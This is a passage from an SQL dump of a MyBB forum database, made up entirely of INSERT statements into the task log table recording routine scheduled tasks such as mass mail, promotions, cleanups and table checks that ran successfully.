successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9248', '3', '1349886765', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9249', '9', '1349887211', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9250', '5', '1349887502', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9251', '9', '1349888213', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9252', '3', '1349888366', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9253', '1', '1349888579', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9254', '7', '1349888885', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9255', '5', '1349888888', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9256', '9', '1349891966', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9257', '5', '1349891975', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9258', '3', '1349892103', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9259', '1', '1349892326', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9260', '7', '1349892335', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9261', '5', '1349894508', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9262', '9', '1349895093', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9263', '3', '1349895146', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9264', '5', '1349895154', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9265', '9', '1349895320', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9266', '3', '1349895563', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9267', '1', '1349895642', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9268', '7', '1349895913', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9269', '5', '1349895929', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9270', '9', '1349896445', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9271', '5', '1349897808', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9272', '9', '1349898734', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9273', '3', '1349898751', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9274', '5', '1349898904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9275', '9', '1349898912', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9276', '3', '1349899396', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9277', '1', '1349899409', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9278', '7', '1349899426', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9279', '5', '1349900639', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9280', '9', '1349901046', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9281', '5', '1349901934', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9282', '3', '1349901973', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9283', '9', '1349902014', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9284', '9', '1349902860', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9285', '3', '1349902862', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9286', '1', '1349902883', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9287', '7', '1349902891', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9288', '5', '1349903559', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9289', '9', '1349903610', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9290', '5', '1349904342', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9291', '9', '1349904373', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9292', '3', '1349904614', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9293', '9', '1349905262', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9294', '5', '1349905919', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9295', '9', '1349906278', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9296', '3', '1349906342', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9297', '1', '1349906417', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9298', '7', '1349907642', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9299', '5', '1349907646', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9300', '9', '1349907652', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9301', '5', '1349908123', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9302', '9', '1349908139', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9303', '3', '1349908497', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9304', '9', '1349908994', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9305', '5', '1349909103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9306', '9', '1349909854', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9307', '3', '1349909945', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9308', '1', '1349910088', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9309', '7', '1349910095', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9310', '5', '1349910303', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9311', '9', '1349910627', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9312', '5', '1349911577', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9313', '9', '1349911585', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9314', '3', '1349911840', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9315', '9', '1349912462', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9316', '5', '1349913362', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9317', '9', '1349913372', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9318', '3', '1349913613', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9319', '1', '1349913651', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9320', '2', '1349914098', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9321', '7', '1349914101', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9322', '11', '1349914194', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9323', '5', '1349914196', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9324', '9', '1349914271', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9325', '5', '1349916217', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9326', '9', '1349916229', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9327', '3', '1349916238', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9328', '5', '1349916339', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9329', '9', '1349916953', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9330', '3', '1349917321', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9331', '1', '1349917506', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9332', '7', '1349917508', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9333', '5', '1349917663', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9334', '9', '1349917870', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9335', '5', '1349918784', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9336', '9', '1349918845', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9337', '3', '1349919025', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9338', '9', '1349919617', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9339', '5', '1349919905', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9340', '9', '1349920510', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9341', '3', '1349920776', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9342', '1', '1349920898', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9343', '7', '1349921065', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9344', '5', '1349921102', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9345', '9', '1349921410', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9346', '5', '1349922497', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9347', '9', '1349922598', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9348', '3', '1349922604', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9349', '9', '1349923328', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9350', '5', '1349923513', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9351', '9', '1349924190', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9352', '3', '1349924353', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9353', '1', '1349924410', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9354', '7', '1349924412', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9355', '5', '1349924767', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9356', '9', '1349925024', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9357', '5', '1349926153', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9358', '9', '1349926162', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9359', '3', '1349926338', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9360', '9', '1349927822', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9361', '5', '1349927835', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9362', '3', '1349928048', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9363', '1', '1349928069', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9364', '7', '1349928077', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9365', '5', '1349928359', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9366', '9', '1349928684', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9367', '5', '1349929845', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9368', '9', '1349930122', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9369', '3', '1349930222', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9370', '9', '1349930442', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9371', '5', '1349931131', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9372', '9', '1349933136', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9373', '3', '1349933153', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9374', '1', '1349933164', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9375', '7', '1349933168', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9376', '5', '1349933174', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9377', '3', '1349933680', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9378', '9', '1349936978', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9379', '5', '1349940308', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9380', '3', '1349943065', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9381', '1', '1349943205', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9382', '7', '1349943209', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9383', '9', '1349944654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9384', '5', '1349945202', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9385', '3', '1349945217', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9386', '9', '1349945231', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9387', '9', '1349945737', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9388', '3', '1349946216', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9389', '1', '1349946238', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9390', '7', '1349946482', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9391', '5', '1349946490', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9392', '9', '1349948026', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9393', '5', '1349948034', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9394', '3', '1349948060', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9395', '9', '1349948503', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9396', '5', '1349948718', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9397', '9', '1349949332', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9398', '3', '1349951657', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9399', '1', '1349951668', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9400', '7', '1349951675', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9401', '5', '1349951677', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9402', '9', '1349951958', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9403', '9', '1349952188', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9404', '5', '1349952311', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9405', '9', '1349954116', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9406', '3', '1349954259', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9407', '1', '1349954266', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9408', '7', '1349955480', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9409', '5', '1349955488', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9410', '9', '1349955494', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9411', '3', '1349955501', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9412', '9', '1349955641', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9413', '5', '1349955928', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9414', '9', '1349956601', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9415', '3', '1349956808', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9416', '1', '1349956891', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9417', '4', '1349956936', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9418', '7', '1349956945', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9419', '5', '1349957134', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9420', '9', '1349957487', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9421', '5', '1349958351', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9422', '9', '1349958851', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9423', '3', '1349958856', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9424', '9', '1349959465', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9425', '5', '1349959560', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9426', '9', '1349960784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9427', '3', '1349960790', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9428', '1', '1349961501', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9429', '7', '1349961505', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9430', '5', '1349961747', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9431', '9', '1349961779', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9432', '5', '1349961907', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9433', '9', '1349961930', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9434', '3', '1349962380', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9435', '9', '1349964691', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9436', '5', '1349965287', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9437', '3', '1349965304', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9438', '1', '1349965309', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9439', '7', '1349965315', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9440', '5', '1349966146', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9441', '9', '1349966176', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9442', '3', '1349966190', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9443', '9', '1349966410', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9444', '5', '1349967153', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9445', '9', '1349967596', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9446', '3', '1349967607', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9447', '1', '1349967619', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9448', '7', '1349967640', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9449', '5', '1349968102', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9450', '9', '1349968413', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9451', '5', '1349969515', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9452', '9', '1349969650', 'The mass mail task successfully ran.'); INSERT INTO 